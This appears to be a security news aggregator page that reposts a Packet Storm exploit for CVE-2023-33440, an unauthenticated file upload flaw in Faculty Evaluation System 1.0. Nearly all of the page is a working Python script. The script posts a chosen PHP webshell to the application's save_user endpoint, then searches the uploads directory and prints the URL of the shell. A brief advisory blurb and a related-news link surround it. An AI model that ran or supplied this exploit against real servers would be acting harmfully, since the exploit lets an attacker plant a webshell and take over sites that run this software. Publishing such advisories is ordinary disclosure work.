Security
Headlines
HeadlinesLatestCVEs

Headline

Faculty Evaluation System 1.0 Shell Upload

Faculty Evaluation System version 1.0 suffers from a remote shell upload vulnerability.

Packet Storm
#sql#vulnerability#web#apache#git#php#auth
# Exploit Title: Faculty Evaluation System 1.0 - Unauthenticated File Upload# Date: 5/29/2023# Author: Alex Gan# Vendor Homepage: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/eval_2.zip# Version: 1.0# Tested on: LAMP Fedora server 38 (Thirty Eight) Apache/2.4.57 10.5.19-MariaDB PHP 8.2.6# CVE: CVE-2023-33440# References: https://nvd.nist.gov/vuln/detail/CVE-2023-33440#        https://www.exploit-db.com/exploits/49320#            https://github.com/F14me7wq/bug_report/tree/main/vendors/oretnom23/faculty-evaluation-system#             #!/usr/bin/env python3import osimport sysimport requestsimport argparsefrom bs4 import BeautifulSoupfrom urllib.parse import urlparsefrom requests.exceptions import ConnectionError, Timeoutdef get_args():    parser = argparse.ArgumentParser()    parser.add_argument('-u', '--url', type=str, help='URL')    parser.add_argument('-p', '--payload', type=str, help='PHP webshell')    return parser.parse_args()def get_user_input(args):    if not (args.url):        args.url = input('Use the -u argument or Enter URL:')    if not (args.payload):        args.payload = input('Use the -p argument or Enter file path PHP webshell: ')    return args.url, args.payloaddef check_input_url(url):    parsed_url = urlparse(url)    if not parsed_url.scheme:        url = 'http://' + url    if parsed_url.path.endswith('/'):        url = url.rstrip('/')    return urldef check_host_availability(url):    try:        response = requests.head(url=url + '/login.php')        if response.status_code == 200:            print("[+] Host is accessible")        else:            print("[-] Host is not accessible")            print("    Status code:", response.status_code)            sys.exit()    except (ConnectionError, Timeout) as e:        print("[-] Host is not accessible")        sys.exit()    except requests.exceptions.RequestException as e:        print("[-] Error:", e)        sys.exit()def make_request(url, method, files=None):    if method == 'GET':        response = requests.get(url)    elif method == 'POST':        response = requests.post(url, files=files)    else:        raise ValueError(f'Invalid HTTP method: {method}')        if response.status_code == 200:        print('[+] Request successful')        return response.text    else:        print(f'[-] Error {response.status_code}: {response.text}')        return Nonedef find_file(response_get, filename, find_url):    soup = BeautifulSoup(response_get, 'html.parser')    links = soup.find_all('a')    found_files = []    for link in links:        file_upl = link.get('href')        if file_upl.endswith(filename):            found_files.append(file_upl)    if found_files:        print('    File found:')        for file in found_files:            print('[*] ' + file)        print('    Full URL of your file:')        for file_url in found_files:            print('[*] ' + find_url + file_url)    else:        print('[-] File not found')def main():    args = get_args()    url, payload = get_user_input(args)    url = check_input_url(url)    check_host_availability(url)    post_url = url + "/ajax.php?action=save_user"    get_url = url + "/assets/uploads/"    filename = os.path.basename(payload)    payload_file = [('img',(filename,open(args.payload,'rb'),'application/octet-stream'))]        print("    Loading payload file")    make_request(post_url,  'POST', files=payload_file)    print("    Listing the uploads directory")    response_get = make_request(get_url, 'GET')    print("    Finding the downloaded payload file")    find_file(response_get, filename, get_url)if __name__ == "__main__":    main()

Related news

CVE-2023-33440: bug_report/RCE-1.md at main · F14me7wq/bug_report

Sourcecodester Faculty Evaluation System v1.0 is vulnerable to arbitrary code execution via /eval/ajax.php?action=save_user.

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution